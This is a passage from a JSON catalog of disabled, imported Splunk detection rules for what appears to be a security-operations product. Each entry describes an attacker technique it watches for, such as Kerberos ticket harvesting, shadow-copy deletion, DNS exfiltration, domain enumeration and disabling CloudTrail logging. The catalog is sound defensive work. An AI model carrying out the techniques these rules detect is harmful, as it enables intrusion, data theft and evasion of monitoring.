"imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-increase-in-user-modification-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0995fca1-f346-432f-b0bf-a66d14e6b428", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_increase_in_user_modification_activity.yml" } }, { "id": "splunk-security-content-09d88404-1e29-46cb-806c-1eedbc85ad5d", "type": "detection", "name": "Windows Steal or Forge Kerberos Tickets Klist", "description": "The following analytic identifies the execution of the Windows OS tool klist.exe, often used by post-exploitation tools like winpeas. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process details. Monitoring klist.exe is significant as it can indicate attempts to list or gather cached Kerberos tickets, which are crucial for lateral movement or privilege escalation. If confirmed malicious, this activity could enable attackers to move laterally within the network or escalate privileges, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-or-forge-kerberos-tickets-klist.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "09d88404-1e29-46cb-806c-1eedbc85ad5d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_or_forge_kerberos_tickets_klist.yml" } }, { "id": "splunk-security-content-09e5c72a-4c0d-11ec-aa29-3e22fbd008af", "type": "detection", "name": "Svchost LOLBAS Execution Process Spawn", "description": "The following analytic detects instances of 'svchost.exe' spawning Living Off The Land Binaries and Scripts (LOLBAS) processes. It leverages Endpoint Detection and Response (EDR) data to monitor child processes of 'svchost.exe' that match known LOLBAS executables. This activity is significant as adversaries often use LOLBAS techniques to execute malicious code stealthily, potentially indicating lateral movement or code execution attempts. If confirmed malicious, this behavior could allow attackers to execute arbitrary commands, escalate privileges, or maintain persistence within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/svchost-lolbas-execution-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "09e5c72a-4c0d-11ec-aa29-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/svchost_lolbas_execution_process_spawn.yml" } }, { "id": "splunk-security-content-0a46537c-be02-11eb-92ca-acde48001122", "type": "detection", "name": "Allow Inbound Traffic By Firewall Rule Registry", "description": "The following analytic detects suspicious modifications to firewall rule registry settings that allow inbound traffic on specific ports with a public profile. It leverages data from the Endpoint.Registry data model, focusing on registry paths and values indicative of such changes. This activity is significant as it may indicate an adversary attempting to grant remote access to a machine by modifying firewall rules. If confirmed malicious, this could enable unauthorized remote access, potentially leading to further exploitation, data exfiltration, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/allow-inbound-traffic-by-firewall-rule-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0a46537c-be02-11eb-92ca-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/allow_inbound_traffic_by_firewall_rule_registry.yml" } }, { "id": "splunk-security-content-0a69fdaa-a2b8-11eb-b16d-acde48001122", "type": "detection", "name": "Excessive Usage of NSLOOKUP App", "description": "The following analytic detects excessive usage of the nslookup application, which may indicate potential DNS exfiltration attempts. It leverages Sysmon EventCode 1 to monitor process executions, specifically focusing on nslookup.exe. The detection identifies outliers by comparing the frequency of nslookup executions against a calculated threshold. This activity is significant as it can reveal attempts by malware or APT groups to exfiltrate data via DNS queries. If confirmed malicious, this behavior could allow attackers to stealthily transfer sensitive information out of the network, bypassing traditional data exfiltration defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-usage-of-nslookup-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0a69fdaa-a2b8-11eb-b16d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_usage_of_nslookup_app.yml" } }, { "id": "splunk-security-content-0a8c4b26-a4e2-4ef1-b0d9-62af6d36bdc8", "type": "detection", "name": "Windows WMIC Shadowcopy Delete", "description": "This analytic detects the use of WMIC to delete volume shadow copies, which is a common technique used by ransomware actors to prevent system recovery. Ransomware like Cactus often delete shadow copies before encrypting files to ensure victims cannot recover their data without paying the ransom. This behavior is particularly concerning as it indicates potential ransomware activity or malicious actors attempting to prevent system recovery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmic-shadowcopy-delete.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0a8c4b26-a4e2-4ef1-b0d9-62af6d36bdc8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmic_shadowcopy_delete.yml" } }, { "id": "splunk-security-content-0ada2f82-b7af-40cc-b1d7-1e5985afcb4e", "type": "detection", "name": "Windows Find Domain Organizational Units with GetDomainOU", "description": "The following analytic detects the execution of the `Get-DomainOU` cmdlet, a part of the PowerView toolkit used for Windows domain enumeration. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this activity. Detecting `Get-DomainOU` usage is significant as adversaries may use it to gather information about organizational units within Active Directory, which can facilitate lateral movement or privilege escalation. If confirmed malicious, this activity could allow attackers to map the domain structure, aiding in further exploitation and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-find-domain-organizational-units-with-getdomainou.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0ada2f82-b7af-40cc-b1d7-1e5985afcb4e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_find_domain_organizational_units_with_getdomainou.yml" } }, { "id": "splunk-security-content-0ae94cdd-021a-4a62-a96d-9cec90b61530", "type": "detection", "name": "M365 Copilot Failed Authentication Patterns", "description": "Detects M365 Copilot users with failed authentication attempts, MFA failures, or multi-location access patterns indicating potential credential attacks or account compromise. The detection aggregates M365 Copilot Graph API authentication events per user, calculating metrics like distinct cities/countries accessed, unique IP addresses and browsers, failed login attempts (status containing \"fail\" or \"error\"), and MFA failures (error code 50074). Users are flagged when they access Copilot from multiple cities (cities_count > 1), experience any authentication failures (failed_attempts > 0), or encounter MFA errors (mfa_failures > 0), which are indicators of credential stuffing, brute force attacks, or compromised accounts attempting to bypass multi-factor authentication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-failed-authentication-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0ae94cdd-021a-4a62-a96d-9cec90b61530", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_failed_authentication_patterns.yml" } }, { "id": "splunk-security-content-0b0c40dc-14a6-11ec-b267-acde48001122", "type": "detection", "name": "MS Scripting Process Loading Ldap Module", "description": "The following analytic detects the execution of MS scripting processes (wscript.exe or cscript.exe) loading LDAP-related modules (Wldap32.dll, adsldp.dll, adsldpc.dll). It leverages Sysmon EventCode 7 to identify these specific DLL loads. This activity is significant as it may indicate an attempt to query LDAP for host information, a behavior observed in FIN7 implants. If confirmed malicious, this could allow attackers to gather detailed Active Directory information, potentially leading to further exploitation or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ms-scripting-process-loading-ldap-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b0c40dc-14a6-11ec-b267-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ms_scripting_process_loading_ldap_module.yml" } }, { "id": "splunk-security-content-0b2eefa5-5508-450d-b970-3dd2fb761aec", "type": "detection", "name": "Detect HTML Help Using InfoTech Storage Handlers", "description": "The following analytic detects the execution of hh.exe (HTML Help) using InfoTech Storage Handlers to load Windows script code from a Compiled HTML Help (CHM) file. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because it can be used to execute malicious scripts embedded within CHM files, potentially leading to code execution. If confirmed malicious, this technique could allow an attacker to execute arbitrary code, escalate privileges, or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-html-help-using-infotech-storage-handlers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b2eefa5-5508-450d-b970-3dd2fb761aec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_html_help_using_infotech_storage_handlers.yml" } }, { "id": "splunk-security-content-0b4e3b06-1b2b-4885-b752-cf06d12a90cb", "type": "detection", "name": "Windows Service Create Kernel Mode Driver", "description": "The following analytic identifies the creation of a new kernel mode driver using the sc.exe command. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. The activity is significant because adding a kernel driver is uncommon in regular operations and can indicate an attempt to gain low-level access to the system. If confirmed malicious, this could allow an attacker to execute code with high privileges, potentially compromising the entire system and evading traditional security measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068", "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-create-kernel-mode-driver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b4e3b06-1b2b-4885-b752-cf06d12a90cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_create_kernel_mode_driver.yml" } }, { "id": "splunk-security-content-0b5c9c2b-e2cb-4831-b4f1-af125ceb1386", "type": "detection", "name": "AWS Unusual Number of Failed Authentications From Ip", "description": "The following analytic identifies a single source IP failing to authenticate into the AWS Console with multiple valid users. It uses CloudTrail logs and calculates the standard deviation for source IP, leveraging the 3-sigma rule to detect unusual numbers of failed authentication attempts. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. If confirmed malicious, this activity could lead to unauthorized access, data breaches, or further exploitation within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-unusual-number-of-failed-authentications-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b5c9c2b-e2cb-4831-b4f1-af125ceb1386", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_unusual_number_of_failed_authentications_from_ip.yml" } }, { "id": "splunk-security-content-0b6b12b9-8ba9-48fe-b3b8-b4e3e1cd22b4", "type": "detection", "name": "Windows RDP File Execution", "description": "The following analytic detects when a Windows RDP client attempts to execute an RDP file from a temporary directory, downloads directory, or Outlook directories. This detection is significant as it can indicate an attempt for an adversary to deliver a .rdp file, which may be leveraged by attackers to control or exfiltrate data. If confirmed malicious, this activity could lead to unauthorized access, data theft, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1598.002", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-file-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b6b12b9-8ba9-48fe-b3b8-b4e3e1cd22b4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_file_execution.yml" } }, { "id": "splunk-security-content-0b6bc75c-05d1-4101-9fc3-97e706168f24", "type": "detection", "name": "O365 Mailbox Email Forwarding Enabled", "description": "The following analytic identifies instances where email forwarding has been enabled on mailboxes within an Office 365 environment. It detects this activity by monitoring the Set-Mailbox operation within the o365_management_activity logs, specifically looking for changes to the ForwardingAddress or ForwardingSmtpAddress parameters. This activity is significant as unauthorized email forwarding can lead to data exfiltration and unauthorized access to sensitive information. If confirmed malicious, attackers could intercept and redirect emails, potentially compromising confidential communications and leading to data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-mailbox-email-forwarding-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b6bc75c-05d1-4101-9fc3-97e706168f24", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_mailbox_email_forwarding_enabled.yml" } }, { "id": "splunk-security-content-0b6ee3f4-04e3-11ec-a87d-acde48001122", "type": "detection", "name": "Get ADUser with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments used to enumerate domain users via the `Get-ADUser` cmdlet. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it may indicate an attempt by adversaries to gather information about domain users for situational awareness and Active Directory discovery. If confirmed malicious, this behavior could lead to further reconnaissance, enabling attackers to identify high-value targets and plan subsequent attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-aduser-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b6ee3f4-04e3-11ec-a87d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_aduser_with_powershell.yml" } }, { "id": "splunk-security-content-0b730470-5fe8-4b13-93a7-fe0ad014d0cc", "type": "detection", "name": "Windows Hidden Schedule Task Settings", "description": "The following analytic detects the creation of hidden scheduled tasks on Windows systems, which are not visible in the UI. It leverages Windows Security EventCode 4698 to identify tasks where the 'Hidden' setting is enabled. This behavior is significant as it may indicate malware activity, such as Industroyer2, or the use of living-off-the-land binaries (LOLBINs) to download additional payloads. If confirmed malicious, this activity could allow attackers to execute code stealthily, maintain persistence, or further compromise the system by downloading additional malicious payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-hidden-schedule-task-settings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b730470-5fe8-4b13-93a7-fe0ad014d0cc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_hidden_schedule_task_settings.yml" } }, { "id": "splunk-security-content-0b78a8f9-1d31-4d23-85c8-56ad13d5b4c1", "type": "detection", "name": "ASL AWS Defense Evasion Stop Logging Cloudtrail", "description": "The following analytic detects `StopLogging` events within AWS CloudTrail logs, a critical action that adversaries may use to evade detection. By halting the logging of their malicious activities, attackers aim to operate undetected within a compromised AWS environment. This detection is achieved by monitoring for specific CloudTrail log entries that indicate the cessation of logging activities. Identifying such behavior is crucial for a Security Operations Center (SOC), as it signals an attempt to undermine the integrity of logging mechanisms, potentially allowing malicious activities to proceed without observation. The impact of this evasion tactic is significant, as it can severely hamper incident response and forensic investigations by obscuring the attacker's actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-defense-evasion-stop-logging-cloudtrail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b78a8f9-1d31-4d23-85c8-56ad13d5b4c1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_defense_evasion_stop_logging_cloudtrail.yml" } }, { "id": "splunk-security-content-0b80e2c8-c746-4ddb-89eb-9efd892220cf", "type": "detection", "name": "AWS ECR Container Scanning Findings Medium", "description": "The following analytic identifies medium-severity findings from AWS Elastic Container Registry (ECR) image scans. It leverages AWS CloudTrail logs, specifically the DescribeImageScanFindings event, to detect vulnerabilities in container images. This activity is significant for a SOC as it highlights potential security risks in containerized applications, which could be exploited if not addressed. If confirmed malicious, these vulnerabilities could lead to unauthorized access, data breaches, or further exploitation within the container environment, compromising the overall security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ecr-container-scanning-findings-medium.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b80e2c8-c746-4ddb-89eb-9efd892220cf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ecr_container_scanning_findings_medium.yml" } }, { "id": "splunk-security-content-0bbfb79c-a755-49a5-a38a-1128d0a452f1", "type": "detection", "name": "Linux Auditd File And Directory Discovery", "description": "The following analytic detects suspicious file and directory discovery activities, which may indicate an attacker's effort to locate sensitive documents and files on a compromised system. This behavior often precedes data exfiltration, as adversaries seek to identify valuable or confidential information for theft. By identifying unusual or unauthorized attempts to browse or enumerate files and directories, this analytic helps security teams detect potential reconnaissance or preparatory actions by an attacker, enabling timely intervention to prevent data breaches or unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-file-and-directory-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0bbfb79c-a755-49a5-a38a-1128d0a452f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_file_and_directory_discovery.yml" } }, { "id": "splunk-security-content-0bdf6092-af17-11eb-939a-acde48001122", "type": "detection", "name": "Excessive Usage Of Cacls App", "description": "The following analytic identifies excessive usage of `cacls.exe`, `xcacls.exe`,\nor `icacls.exe` to change file or folder permissions.\nIt looks for 10 or more execution of the aforementioned processes in the span of 1 minute.\nIt leverages data from Endpoint Detection and Response (EDR) agents,\nfocusing on process names and command-line executions.\nThis activity is significant as it may indicate an adversary attempting\nto restrict access to malware components or artifacts on a compromised system.\nIf confirmed malicious, this behavior could prevent users from deleting or accessing\ncritical files, aiding in the persistence and concealment of malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-usage-of-cacls-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0bdf6092-af17-11eb-939a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_usage_of_cacls_app.yml" } }, { "id": "splunk-security-content-0be4b5d6-c449-4084-b945-2392b519c33b", "type": "detection", "name": "Windows Service Create RemComSvc", "description": "The following analytic detects the creation of the RemComSvc service on a Windows endpoint, typically indicating lateral movement using RemCom.exe. It leverages Windows EventCode 7045 from the System event log, specifically looking for the \"RemCom Service\" name. This activity is significant as it often signifies unauthorized lateral movement within the network, which is a common tactic used by attackers to spread malware or gain further access. If confirmed malicious, this could lead to unauthorized access to sensitive systems, data exfiltration, or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-create-remcomsvc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0be4b5d6-c449-4084-b945-2392b519c33b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_create_remcomsvc.yml" } }, { "id": "splunk-security-content-0c0badad-4536-4a84-a561-5ff760f3c00e", "type": "detection", "name": "Azure AD User ImmutableId Attribute Updated", "description": "The following analytic identifies the modification of the SourceAnchor (ImmutableId) attribute for an Azure Active Directory user. This detection leverages Azure AD audit logs, specifically monitoring the \"Update user\" operation and changes to the SourceAnchor attribute. This activity is significant as it is a step in setting up an Azure AD identity federation backdoor, allowing an adversary to establish persistence. If confirmed malicious, the attacker could impersonate any user, bypassing password and MFA requirements, leading to unauthorized access and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-user-immutableid-attribute-updated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0c0badad-4536-4a84-a561-5ff760f3c00e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_user_immutableid_attribute_updated.yml" } }, { "id": "splunk-security-content-0c1d2e3f-4a5b-6c7d-8e9f-0a1b2c3d4e5f", "type": "detection", "name": "Cisco Secure Firewall - Privileged Command Execution via HTTP", "description": "This analytic detects HTTP requests to privileged execution paths on Cisco routers, specifically targeting the `/level/15/exec/-/*` endpoint using Cisco Secure Firewall Intrusion Events.\nThis detection leverages Snort signature 65370 to identify requests to these sensitive endpoints, which when combined with other indicators may signal active exploitation or post-compromise activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-privileged-command-execution-via-http.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0c1d2e3f-4a5b-6c7d-8e9f-0a1b2c3d4e5f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___privileged_command_execution_via_http.yml" } }, { "id": "splunk-security-content-0c320fea-6e87-4b99-a884-74d09d4b655d", "type": "detection", "name": "Linux Auditd Osquery Service Stop", "description": "The following analytic detects suspicious stopping of the `osquery` service, which may indicate an attempt to disable monitoring and evade detection. `Osquery` is a powerful tool used for querying system information and detecting anomalies, and stopping its service can be a sign that an attacker is trying to disrupt security monitoring or hide malicious activities. By monitoring for unusual or unauthorized stops of the `osquery` service, this analytic helps identify potential efforts to bypass security controls, enabling security teams to investigate and respond to possible threats effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/linux-auditd-osquery-service-stop.yaml", "provenance": { "source": "splunk/security_content", "source_id": "0c320fea-6e87-4b99-a884-74d09d4b655d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_osquery_service_stop.yml" } }, { "id": "splunk-security-content-0c3f3e09-e47a-410e-856f-a02a5c5fafb0", "type": "detection", "name": "Windows System User Discovery Via Quser", "description": "The following analytic detects the execution of the Windows OS tool quser.exe, commonly used to gather information about user sessions on a Remote Desktop Session Host server. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. Monitoring this activity is crucial as quser.exe is often abused by post-exploitation tools like winpeas, used in ransomware attacks to enumerate user sessions. If confirmed malicious, attackers could leverage this information to further compromise the system, maintain persistence, or escalate privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], 